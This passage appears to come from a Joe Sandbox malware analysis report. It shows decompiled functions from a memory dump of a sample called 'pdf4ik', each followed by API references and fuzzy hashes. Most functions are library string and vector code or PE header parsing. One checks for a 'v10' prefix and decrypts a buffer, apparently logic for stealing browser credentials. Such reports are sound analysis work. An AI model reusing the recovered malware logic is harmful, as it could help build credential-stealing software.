                                        							_t125 =  *0x29dd0b28;
                                        							while(1) {
                                        								asm("fcom st0, st1");
                                        								asm("fnstsw ax");
                                        								if((_t62 & 0x00000001) != 0 || _t90 >= 0x1388) {
                                        									break;
                                        								}
                                        								_t94 = _t94 + 0xfffffff6;
                                        								asm("fxch st0, st1");
                                        								asm("adc ecx, 0xffffffff");
                                        								_t125 = _t125 * st2;
                                        								_t90 = _t90 + 0xa;
                                        								_t117 = _t74;
                                        								if(_t117 > 0 || _t117 >= 0 && _t94 >= 0xa) {
                                        									asm("fxch st0, st1");
                                        									continue;
                                        								} else {
                                        									st1 = _t125;
                                        									goto L32;
                                        								}
                                        							}
                                        							st0 = _t125;
                                        						}
                                        						goto L32;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: swprintf
                                        • String ID: $$%$+
                                        • API String ID: 233258989-3202472541
                                        • Opcode ID: e31ee64526ca11dfd8ceeebf474bfcdde55393f61465ff32f1af42603bf0deea
                                        • Instruction ID: d2e3c0959d7bce55847088913fdc54b2d2e0a456758155c9122e702f691a76a8
                                        • Opcode Fuzzy Hash: e31ee64526ca11dfd8ceeebf474bfcdde55393f61465ff32f1af42603bf0deea
                                        • Instruction Fuzzy Hash: BB517D77A09340DADB058B14C980B8B7FE8FF85380F90995DF9C083792E639C9669792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E29D99510(char* __ebx, intOrPtr __ecx, char __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v48;
                                        				long _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				int _v124;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t34;
                                        				signed int _t35;
                                        				intOrPtr _t37;
                                        				intOrPtr* _t39;
                                        				intOrPtr _t40;
                                        				long _t48;
                                        				char* _t55;
                                        				intOrPtr* _t57;
                                        				intOrPtr _t74;
                                        				intOrPtr _t75;
                                        				char _t79;
                                        				intOrPtr _t81;
                                        				long _t82;
                                        				void* _t83;
                                        				signed int _t85;
                                        
                                        				_t70 = __edx;
                                        				_t56 = __ecx;
                                        				_t55 = __ebx;
                                        				_push(0xffffffff);
                                        				_push(E29DC1E98);
                                        				_push( *[fs:0x0]);
                                        				_t34 =  *0x29dd5664; // 0xd9555f04
                                        				_t35 = _t34 ^ _t85;
                                        				_v20 = _t35;
                                        				_push(_t35);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t37 = _a8;
                                        				_t79 = __edx;
                                        				_t74 = __ecx;
                                        				_v56 = _t37;
                                        				_v52 = 0;
                                        				if(__edx < 3 ||  *((char*)(__ecx)) != 0x76 ||  *((char*)(__ecx + 1)) != 0x31 ||  *((char*)(__ecx + 2)) != 0x30) {
                                        					_t39 = E29D994A0(_t79, _t56, __eflags);
                                        					_t80 = _t39;
                                        					_t57 = _t39;
                                        					 *((intOrPtr*)(_t55 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t55 + 0x10)) = 0;
                                        					 *_t55 = 0;
                                        					_t30 = _t57 + 1; // 0x1
                                        					_t70 = _t30;
                                        					do {
                                        						_t40 =  *_t57;
                                        						_t57 = _t57 + 1;
                                        						__eflags = _t40;
                                        					} while (_t40 != 0);
                                        					__eflags = _t57 - _t70;
                                        					E29D892C0(_t55, _t80, _t57 - _t70);
                                        				} else {
                                        					if(_a4 == 0 || _t37 == 0) {
                                        						L9:
                                        						E29D89100(_t55, "NULL");
                                        					} else {
                                        						E29DB5640( &_v124, 0, 0x40);
                                        						_t11 = _t74 + 3 - 0x13; // -19
                                        						_t82 = _t79 + 0xffffffe1;
                                        						_v124 = 0x40;
                                        						_v120 = 1;
                                        						_v116 = _t74 + 3;
                                        						_v112 = 0xc;
                                        						_v100 = _t79 + _t11;
                                        						_v96 = 0x10;
                                        						_v52 = _t82;
                                        						_t83 = LocalAlloc(0x40, _t82);
                                        						if(_t83 == 0) {
                                        							goto L9;
                                        						} else {
                                        							_t48 = _v52;
                                        							_push(0);
                                        							_push( &_v52);
                                        							_t70 = _v112 + _v116;
                                        							_push(_t48);
                                        							_push(_t83);
                                        							_push(0);
                                        							_push(0);
                                        							_push( &_v124);
                                        							_push(_t48);
                                        							_push(_v112 + _v116);
                                        							_push(_v56);
                                        							if( *0x29dd8568() < 0) {
                                        								goto L9;
                                        							} else {
                                        								E29DA08C0(_v52, _t83,  &_v48);
                                        								_v8 = 0;
                                        								E29D89140(__ebx);
                                        								E29D89160( &_v48);
                                        							}
                                        						}
                                        					}
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t75);
                                        				_pop(_t81);
                                        				return E29DADF46(_t55, _t55, _v20 ^ _t85, _t70, _t75, _t81);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D9958B
                                        • LocalAlloc.KERNEL32(00000040,-000000E1,D9555F04), ref: 29D995C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocal_memset
                                        • String ID: @$NULL
                                        • API String ID: 52611349-3099716844
                                        • Opcode ID: 2508f4ffecd1698c4cb3052b9f462fa739ec3b3216cbf8f1d5aec9c45930e5b0
                                        • Instruction ID: 014d5456eeb9db1d7e1499313a75e9fb5a21ac22ee1088365f1f53e0c452c328
                                        • Opcode Fuzzy Hash: 2508f4ffecd1698c4cb3052b9f462fa739ec3b3216cbf8f1d5aec9c45930e5b0
                                        • Instruction Fuzzy Hash: A9410671E14214ABEB14DF64CC44FAEBBB8FF44790F10822DE905EB681DB759906DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E29D97B00(intOrPtr* _a4, signed int _a8, signed int _a12) {
                                        				char _v8;
                                        				char _v16;
                                        				intOrPtr _v20;
                                        				char _v24;
                                        				char _v36;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				signed int _t38;
                                        				intOrPtr* _t41;
                                        				intOrPtr* _t42;
                                        				unsigned int _t51;
                                        				intOrPtr* _t52;
                                        				unsigned int _t55;
                                        				void* _t56;
                                        				signed int _t57;
                                        				intOrPtr* _t70;
                                        				signed int _t74;
                                        				signed int _t79;
                                        				intOrPtr _t80;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC1F20);
                                        				_push( *[fs:0x0]);
                                        				_t80 = _t79 - 0x14;
                                        				_push(_t51);
                                        				_t35 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t35 ^ _t79);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v20 = _t80;
                                        				_t38 = _a8;
                                        				_t70 = _a4;
                                        				_t74 = _t38 | 0x00000007;
                                        				if(_t74 <= 0x7ffffffe) {
                                        					_t51 =  *(_t70 + 0x14);
                                        					_t55 = _t51 >> 1;
                                        					_t64 = 0xaaaaaaab * _t74 >> 0x20 >> 1;
                                        					__eflags = _t55 - 0xaaaaaaab * _t74 >> 0x20 >> 1;
                                        					if(__eflags > 0) {
                                        						_t74 = _t55 + _t51;
                                        						__eflags = _t51 - 0x7ffffffe - _t55;
                                        						if(__eflags > 0) {
                                        							_t74 = 0x7ffffffe;
                                        						}
                                        					}
                                        				} else {
                                        					_t74 = _t38;
                                        				}
                                        				_t41 = 0;
                                        				_t11 = _t74 + 1; // 0x7fffffff
                                        				_t56 = _t11;
                                        				_v8 = 0;
                                        				if(_t56 <= 0) {
                                        					L8:
                                        					_t52 = _t41;
                                        					_t57 = _a12;
                                        					if(_t57 != 0) {
                                        						if( *(_t70 + 0x14) < 8) {
                                        							_t42 = _t70;
                                        						} else {
                                        							_t42 =  *_t70;
                                        						}
                                        						_t41 = E29DB0010(_t52, _t42, _t57 + _t57);
                                        						_t57 = _a12;
                                        						_t80 = _t80 + 0xc;
                                        					}
                                        					if( *(_t70 + 0x14) >= 8) {
                                        						_push( *_t70);
                                        						_t41 = E29DADF3B();
                                        						_t57 = _a12;
                                        					}
                                        					 *_t70 = _t52;
                                        					 *(_t70 + 0x14) = _t74;
                                        					 *(_t70 + 0x10) = _t57;
                                        					if(_t74 >= 8) {
                                        						_t70 = _t52;
                                        					}
                                        					 *((short*)(_t70 + _t57 * 2)) = 0;
                                        					 *[fs:0x0] = _v16;
                                        					return _t41;
                                        				} else {
                                        					_t85 = _t56 - 0x7fffffff;
                                        					if(_t56 > 0x7fffffff) {
                                        						L9:
                                        						_v24 = 0;
                                        						E29DAE0FC( &_v36,  &_v24);
                                        						_v36 = 0x29dc52ac;
                                        						E29DAFF06( &_v36, 0x29dd2028);
                                        						_v20 = _t80;
                                        						_v8 = 2;
                                        						_v24 = E29D97C70(_a8 + 1, _t70, _t74);
                                        						return E29D97BD6;
                                        					} else {
                                        						_t41 = E29DAE70E(_t51, _t64, _t70, _t74, _t85, _t56 + _t56);
                                        						_t80 = _t80 + 4;
                                        						if(0 == 0) {
                                        							goto L9;
                                        						} else {
                                        							goto L8;
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D97B9E
                                          • Part of subcall function 29DAE0FC: std::exception::_Copy_str.LIBCMT ref: 29DAE117
                                        • __CxxThrowException@8.LIBCMT ref: 29D97BB3
                                          • Part of subcall function 29DAFF06: RaiseException.KERNEL32(29D89803,00000001,D9555F04,29DC52AC,29D89803,00000001,29DD2028,29D851F1,D9555F04), ref: 29DAFF48
                                          • Part of subcall function 29D97C70: std::exception::exception.LIBCMT ref: 29D97CA2
                                          • Part of subcall function 29D97C70: __CxxThrowException@8.LIBCMT ref: 29D97CB7
                                        • _memmove.LIBCMT ref: 29D97BF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
                                        • String ID: )
                                        • API String ID: 163498487-2427484129
                                        • Opcode ID: f9af097d8548294e687d1fa907a26f84f02313cbf5794f453ce467c0d314f74b
                                        • Instruction ID: d5896283b4ed4fcfce2df443efa14301e8ccd5609e2a289106ae9e88bb9668d2
                                        • Opcode Fuzzy Hash: f9af097d8548294e687d1fa907a26f84f02313cbf5794f453ce467c0d314f74b
                                        • Instruction Fuzzy Hash: 7741CBB1A10115EBDB04DF68C890A9EB7F4FF54654F10462DE81797B80EB30A915D7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E29D893C0(intOrPtr* __ecx, signed int _a4) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t29;
                                        				intOrPtr _t36;
                                        				intOrPtr _t37;
                                        				signed int _t51;
                                        				intOrPtr _t59;
                                        				signed int _t77;
                                        				intOrPtr* _t82;
                                        				signed int _t84;
                                        				void* _t85;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC22F0);
                                        				_push( *[fs:0x0]);
                                        				_t29 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t29 ^ _t84);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v20 = _t85 - 8;
                                        				_t82 = __ecx;
                                        				_t77 = _a4;
                                        				if(_t77 > 0x3c3c3c3) {
                                        					E29DAD440("vector<T> too long");
                                        				}
                                        				_t36 = (0x78787879 * ( *((intOrPtr*)(_t82 + 8)) -  *_t82) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * ( *((intOrPtr*)(_t82 + 8)) -  *_t82) >> 0x20 >> 5);
                                        				if(_t36 < _t77) {
                                        					_t37 = E29D89660(_t77, _t77, _t82);
                                        					_v8 = 0;
                                        					_push(_a4);
                                        					_v24 = _t37;
                                        					E29D89E10( *_t82,  *((intOrPtr*)(_t82 + 4)), _t37);
                                        					_t80 =  *((intOrPtr*)(_t82 + 4));
                                        					_t59 =  *_t82;
                                        					_t51 = (0x78787879 * ( *((intOrPtr*)(_t82 + 4)) - _t59) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * ( *((intOrPtr*)(_t82 + 4)) - _t59) >> 0x20 >> 5);
                                        					if(_t59 != 0) {
                                        						_push(_a4);
                                        						E29D89DB0(_t59, _t80);
                                        						_push( *_t82);
                                        						E29DADF3B();
                                        					}
                                        					_t36 = _v24;
                                        					 *((intOrPtr*)(_t82 + 8)) = _t36 + ((_a4 << 4) + _a4) * 4;
                                        					 *((intOrPtr*)(_t82 + 4)) = _t36 + ((_t51 << 4) + _t51) * 4;
                                        					 *_t82 = _t36;
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				return _t36;
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D893FD
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                        • String ID: vector<T> too long$yxxx$yxxx
                                        • API String ID: 1823113695-1517697755
                                        • Opcode ID: 31f96c04505d851a5ab37845352a182b8e98d4ba7e43d42a930b49fa8e315d80
                                        • Instruction ID: 7fce7fa50d4e3de5585cae2fb0648a32da0b8978d454fec0ac78d050827dc99c
                                        • Opcode Fuzzy Hash: 31f96c04505d851a5ab37845352a182b8e98d4ba7e43d42a930b49fa8e315d80
                                        • Instruction Fuzzy Hash: B221D6B6B00205AFC718CF5DC894A6AB7E6FFD8250F15C62DE946DB744EA30B901CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D957D0(void* __ebx, signed int __ecx, intOrPtr* __esi, char _a4) {
                                        				intOrPtr _t17;
                                        				intOrPtr* _t19;
                                        				char* _t27;
                                        				void* _t31;
                                        				intOrPtr _t35;
                                        				intOrPtr _t36;
                                        				signed int _t42;
                                        				intOrPtr* _t47;
                                        
                                        				_t47 = __esi;
                                        				_t31 = __ebx;
                                        				_t17 =  *((intOrPtr*)(__esi + 0x10));
                                        				if((__ecx | 0xffffffff) - _t17 <= __ebx) {
                                        					_t17 = E29DAD440("string too long");
                                        				}
                                        				if(_t31 == 0) {
                                        					L23:
                                        					return _t47;
                                        				} else {
                                        					_t42 = _t17 + _t31;
                                        					if(_t42 > 0xfffffffe) {
                                        						_t17 = E29DAD440("string too long");
                                        					}
                                        					_t35 =  *((intOrPtr*)(_t47 + 0x14));
                                        					if(_t35 >= _t42) {
                                        						if(_t42 != 0) {
                                        							goto L7;
                                        						} else {
                                        							 *((intOrPtr*)(_t47 + 0x10)) = _t42;
                                        							if(_t35 < 0x10) {
                                        								_t27 = _t47;
                                        								 *_t27 = 0;
                                        								return _t27;
                                        							} else {
                                        								 *((char*)( *_t47)) = 0;
                                        								return _t47;
                                        							}
                                        						}
                                        					} else {
                                        						E29D89750(_t47, _t42, _t17);
                                        						if(_t42 == 0) {
                                        							L22:
                                        							goto L23;
                                        						} else {
                                        							L7:
                                        							_t36 =  *((intOrPtr*)(_t47 + 0x10));
                                        							if(_t31 != 1) {
                                        								if( *((intOrPtr*)(_t47 + 0x14)) < 0x10) {
                                        									_t19 = _t47;
                                        								} else {
                                        									_t19 =  *_t47;
                                        								}
                                        								E29DB5640(_t19 + _t36, _a4, _t31);
                                        							} else {
                                        								if( *((intOrPtr*)(_t47 + 0x14)) < 0x10) {
                                        									 *((char*)(_t47 + _t36)) = _a4;
                                        								} else {
                                        									 *((char*)( *_t47 + _t36)) = _a4;
                                        								}
                                        							}
                                        							 *((intOrPtr*)(_t47 + 0x10)) = _t42;
                                        							if( *((intOrPtr*)(_t47 + 0x14)) < 0x10) {
                                        								 *((char*)(_t47 + _t42)) = 0;
                                        								goto L22;
                                        							} else {
                                        								 *((char*)( *_t47 + _t42)) = 0;
                                        								return _t47;
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D957E4
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D957FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                        • String ID: string too long
                                        • API String ID: 963545896-2556327735
                                        • Opcode ID: bc5b25de3365b24899d5d97e670fccd878ab1431f72e9f97c2afe313ff8055c7
                                        • Instruction ID: 320f1872745fdbea6e88a7950d2b3aed4a82ffa3b19649343852acd289697613
                                        • Opcode Fuzzy Hash: bc5b25de3365b24899d5d97e670fccd878ab1431f72e9f97c2afe313ff8055c7
                                        • Instruction Fuzzy Hash: 51214F717243408BE3259E1CD840929BBE9DFA6610F100A7EEDD28BF51C7B19447E3A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E29D84870(intOrPtr* __ebx, void* __edi, intOrPtr* __esi) {
                                        				intOrPtr _t21;
                                        				signed int _t24;
                                        				intOrPtr _t25;
                                        				signed int _t26;
                                        				intOrPtr* _t40;
                                        
                                        				if( *((intOrPtr*)(__ebx + 4)) < 0x40) {
                                        					L9:
                                        					return 1;
                                        				} else {
                                        					E29DB0010(__esi,  *__ebx, 0x40);
                                        					if( *__esi != 0x5a4d) {
                                        						L12:
                                        						return 2;
                                        					} else {
                                        						_t21 =  *((intOrPtr*)(__esi + 0x3c));
                                        						if(_t21 == 0) {
                                        							goto L12;
                                        						} else {
                                        							if(_t21 + 0xf8 >  *((intOrPtr*)(__ebx + 4))) {
                                        								goto L9;
                                        							} else {
                                        								_push(__edi);
                                        								_t40 = __esi + 0x40;
                                        								E29DB0010(_t40,  *__ebx + _t21, 0xf8);
                                        								if( *_t40 != 0x4550 ||  *((intOrPtr*)(__esi + 0x58)) != 0x10b) {
                                        									L11:
                                        									return 2;
                                        								} else {
                                        									_t24 =  *(__esi + 0x46) & 0x0000ffff;
                                        									if(_t24 == 0) {
                                        										goto L11;
                                        									} else {
                                        										_t42 = _t24 + _t24 * 4;
                                        										_t43 = _t24 + _t24 * 4 + _t42;
                                        										_t45 = _t24 + _t24 * 4 + _t42 + _t43 + _t24 + _t24 * 4 + _t42 + _t43;
                                        										 *((intOrPtr*)(__esi + 0x140)) = _t24 + _t24 * 4 + _t42 + _t43 + _t24 + _t24 * 4 + _t42 + _t43;
                                        										_t25 = E29DADFE0(0x10b, _t24 + _t24 * 4 + _t42 + _t43 + _t24 + _t24 * 4 + _t42 + _t43, __esi, _t24 + _t24 * 4 + _t42 + _t43 + _t24 + _t24 * 4 + _t42 + _t43);
                                        										 *((intOrPtr*)(__esi + 0x138)) = _t25;
                                        										if(_t25 != 0) {
                                        											 *((intOrPtr*)(__esi + 0x13c)) = ( *(__esi + 0x54) & 0x0000ffff) +  *((intOrPtr*)(__esi + 0x3c)) + 0x18;
                                        											_t26 = E29D84EF0(__esi, _t25, ( *(__esi + 0x54) & 0x0000ffff) +  *((intOrPtr*)(__esi + 0x3c)) + 0x18, _t45, __ebx);
                                        											asm("sbb eax, eax");
                                        											return  ~_t26 + 1;
                                        										} else {
                                        											return 3;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}









                                        APIs
                                        • _memmove.LIBCMT ref: 29D84880
                                        • _memmove.LIBCMT ref: 29D848BB
                                        • _malloc.LIBCMT ref: 29D848EF
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memmove$AllocateHeap_malloc
                                        • String ID: @
                                        • API String ID: 2758062913-2766056989
                                        • Opcode ID: d8dc692ed96f1db9e76841082e597a28353635ae11b8252da0b51d6726e11141
                                        • Instruction ID: 0b20c148dad6af0a99a82dd40c52fbd980d48ab171a3145d28aa6fad908fa199
                                        • Opcode Fuzzy Hash: d8dc692ed96f1db9e76841082e597a28353635ae11b8252da0b51d6726e11141
                                        • Instruction Fuzzy Hash: 041124716002009BD734DF2AE890BAA33E4FF81700F80486DE59A8BE86E774F543E750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E29D9572D(signed int __ecx, signed int __edi) {
                                        				intOrPtr* _t26;
                                        				signed int _t28;
                                        				signed int _t31;
                                        				char _t39;
                                        				signed int _t41;
                                        				signed int _t47;
                                        				signed int _t49;
                                        				void* _t51;
                                        
                                        				_t47 = __edi;
                                        				_t41 = __ecx;
                                        				_t49 =  *(_t51 + 8);
                                        				if( *(_t49 + 0x14) >= 0x10) {
                                        					_push( *__esi);
                                        					E29DADF3B();
                                        					__esp = __esp + 4;
                                        				}
                                        				 *(_t49 + 0x14) = 0xf;
                                        				 *(_t49 + 0x10) = 0;
                                        				 *_t49 = 0;
                                        				E29DAFF06(0, 0);
                                        				L12:
                                        				while(1) {
                                        					if(_t47 != 0) {
                                        						L8:
                                        						_t41 =  *(_t49 + 0x10);
                                        						if( *(_t49 + 0x14) < 0x10) {
                                        							_t28 = _t49;
                                        						} else {
                                        							_t28 =  *_t49;
                                        						}
                                        						 *((char*)(_t28 + _t41)) = _t39;
                                        						 *(_t49 + 0x10) = _t47;
                                        						if( *(_t49 + 0x14) < 0x10) {
                                        							 *((char*)(_t49 + _t47)) = 0;
                                        							goto L20;
                                        						} else {
                                        							 *((char*)( *_t49 + _t47)) = 0;
                                        							_t26 =  *((intOrPtr*)(_t51 + 0xc)) + 1;
                                        							 *((intOrPtr*)(_t51 + 0xc)) = _t26;
                                        							L1:
                                        							if(_t26 ==  *((intOrPtr*)(_t51 + 0x10))) {
                                        								 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
                                        								return _t26;
                                        							}
                                        							_t39 =  *_t26;
                                        							_t31 =  *(_t49 + 0x10);
                                        							if((_t41 | 0xffffffff) - _t31 <= 1) {
                                        								_t31 = E29DAD440("string too long");
                                        							}
                                        							_t5 = _t31 + 1; // 0x1
                                        							_t47 = _t5;
                                        							if(_t47 > 0xfffffffe) {
                                        								_t31 = E29DAD440("string too long");
                                        							}
                                        							_t41 =  *(_t49 + 0x14);
                                        							if(_t41 >= _t47) {
                                        								continue;
                                        							} else {
                                        								_t41 = _t49;
                                        								E29D89750(_t41, _t47, _t31);
                                        								if(_t47 == 0) {
                                        									L20:
                                        									_t26 =  *((intOrPtr*)(_t51 + 0xc)) + 1;
                                        									 *((intOrPtr*)(_t51 + 0xc)) = _t26;
                                        									goto L1;
                                        								}
                                        								goto L8;
                                        							}
                                        						}
                                        					}
                                        					 *(_t49 + 0x10) = _t47;
                                        					if(_t41 < 0x10) {
                                        						 *_t49 = 0;
                                        						_t26 =  *((intOrPtr*)(_t51 + 0xc)) + 1;
                                        						 *((intOrPtr*)(_t51 + 0xc)) = _t26;
                                        					} else {
                                        						 *( *_t49) = 0;
                                        						_t26 =  *((intOrPtr*)(_t51 + 0xc)) + 1;
                                        						 *((intOrPtr*)(_t51 + 0xc)) = _t26;
                                        					}
                                        					goto L1;
                                        				}
                                        			}












                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D956ED
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D956FF
                                        • __CxxThrowException@8.LIBCMT ref: 29D95756
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$Exception@8Throw
                                        • String ID: string too long
                                        • API String ID: 2310008865-2556327735
                                        • Opcode ID: 97a0a796f14cffcd49dd7c1381f1f41c2fc84011851445efd69e93a510fa89e6
                                        • Instruction ID: c6fd0946ec154af5aa53ba96725bc14eeae742bf527e5416ec69a84e4457adfe
                                        • Opcode Fuzzy Hash: 97a0a796f14cffcd49dd7c1381f1f41c2fc84011851445efd69e93a510fa89e6
                                        • Instruction Fuzzy Hash: DF21C638120740DFE325DF24C490B1A77F1AF51310F508A6CD9D24BE81DB71A647EB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D89250(intOrPtr* __ecx) {
                                        				unsigned int _t15;
                                        				signed int _t16;
                                        				intOrPtr* _t19;
                                        				unsigned int _t29;
                                        				intOrPtr _t30;
                                        				void* _t35;
                                        				signed int _t36;
                                        
                                        				_t19 = __ecx;
                                        				_t30 =  *__ecx;
                                        				_t35 = (0x78787879 * ( *((intOrPtr*)(__ecx + 4)) - _t30) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * ( *((intOrPtr*)(__ecx + 4)) - _t30) >> 0x20 >> 5);
                                        				if(_t35 > 0x3c3c3c2) {
                                        					E29DAD440("vector<T> too long");
                                        				}
                                        				_t36 = _t35 + 1;
                                        				_t15 = (0x78787879 * ( *((intOrPtr*)(_t19 + 8)) - _t30) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * ( *((intOrPtr*)(_t19 + 8)) - _t30) >> 0x20 >> 5);
                                        				if(_t36 > _t15) {
                                        					_t29 = _t15 >> 1;
                                        					if(0x3c3c3c3 - _t29 >= _t15) {
                                        						_t16 = _t15 + _t29;
                                        					} else {
                                        						_t16 = 0;
                                        					}
                                        					if(_t16 < _t36) {
                                        						_t16 = _t36;
                                        					}
                                        					return E29D893C0(_t19, _t16);
                                        				}
                                        				return _t15;
                                        			}











                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89277
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                        • String ID: vector<T> too long$yxxx$yxxx
                                        • API String ID: 1823113695-1517697755
                                        • Opcode ID: f25ab4cac38e48f2caba86618489450b4b67473b843c4e28878d4476449dd3dd
                                        • Instruction ID: 92338325696e8bad7c053c88c3949470c5fae7777616d68d1477b7f7a377d3a5
                                        • Opcode Fuzzy Hash: f25ab4cac38e48f2caba86618489450b4b67473b843c4e28878d4476449dd3dd
                                        • Instruction Fuzzy Hash: EBF0BB67B000212F8308947DCC8854FA9476AE52903AAD769D986DFB5EDC31EC83A1D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E29D99300(intOrPtr __ecx, long __edx, CHAR* _a4) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				char _v48;
                                        				intOrPtr _v52;
                                        				long* _v56;
                                        				char _v60;
                                        				char _v64;
                                        				intOrPtr _v68;
                                        				long _v72;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t42;
                                        				signed int _t43;
                                        				void* _t46;
